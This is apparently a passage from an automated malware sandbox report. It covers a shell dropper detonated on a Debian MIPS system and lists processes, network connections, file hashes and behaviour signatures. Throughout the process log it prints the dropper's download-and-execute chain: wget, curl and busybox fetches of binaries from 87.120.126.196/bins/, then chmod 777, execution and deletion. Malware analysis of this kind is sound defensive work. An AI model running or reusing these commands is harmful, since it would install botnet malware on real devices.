/bin/chmod
[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/rm
[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/wget
[wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/chmod
[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/rm
[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/wget
[wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/chmod
[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/rm
[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/wget
[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/wget
[wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/chmod
[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/rm
[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/wget
[wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/chmod
[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/rm
[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/753-1-0xb6703000-0xb6714044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-25 01:20
Reported
2024-10-25 01:23
Platform
debian9-mipsbe-20240729-en
Max time kernel
65s
Max time network
66s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
| N/A | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | N/A |
| N/A | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | N/A |
| N/A | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | N/A |
| N/A | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | N/A |
| N/A | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | N/A |
| N/A | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | N/A |
| N/A | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | N/A |
| N/A | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | N/A |
| N/A | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | N/A |
| N/A | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | N/A |
| N/A | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | N/A |
| N/A | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | N/A |
| N/A | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | N/A |
| N/A | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | N/A |
| N/A | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | N/A |
| N/A | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | N/A |
| N/A | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | N/A |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
| N/A | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | N/A |
| N/A | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | N/A |
| N/A | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | N/A |
| N/A | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | N/A |
| N/A | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | N/A |
| N/A | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | N/A |
| N/A | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | N/A |
| N/A | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | N/A |
| N/A | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /usr/bin/curl | N/A |
Processes
/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
[/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/wget
[wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/chmod
[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/rm
[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/wget
[wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/chmod
[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/rm
[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/chmod
[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/rm
[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/wget
[wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/chmod
[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/rm
[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/wget
[wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/chmod
[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/rm
[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/wget
[wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/chmod
[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/rm
[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/wget
[wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/chmod
[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/rm
[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/wget
[wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/chmod
[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/rm
[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/wget
[wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/chmod
[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/rm
[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/wget
[wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/chmod
[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/rm
[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/wget
[wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/chmod
[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/rm
[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/wget
[wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/chmod
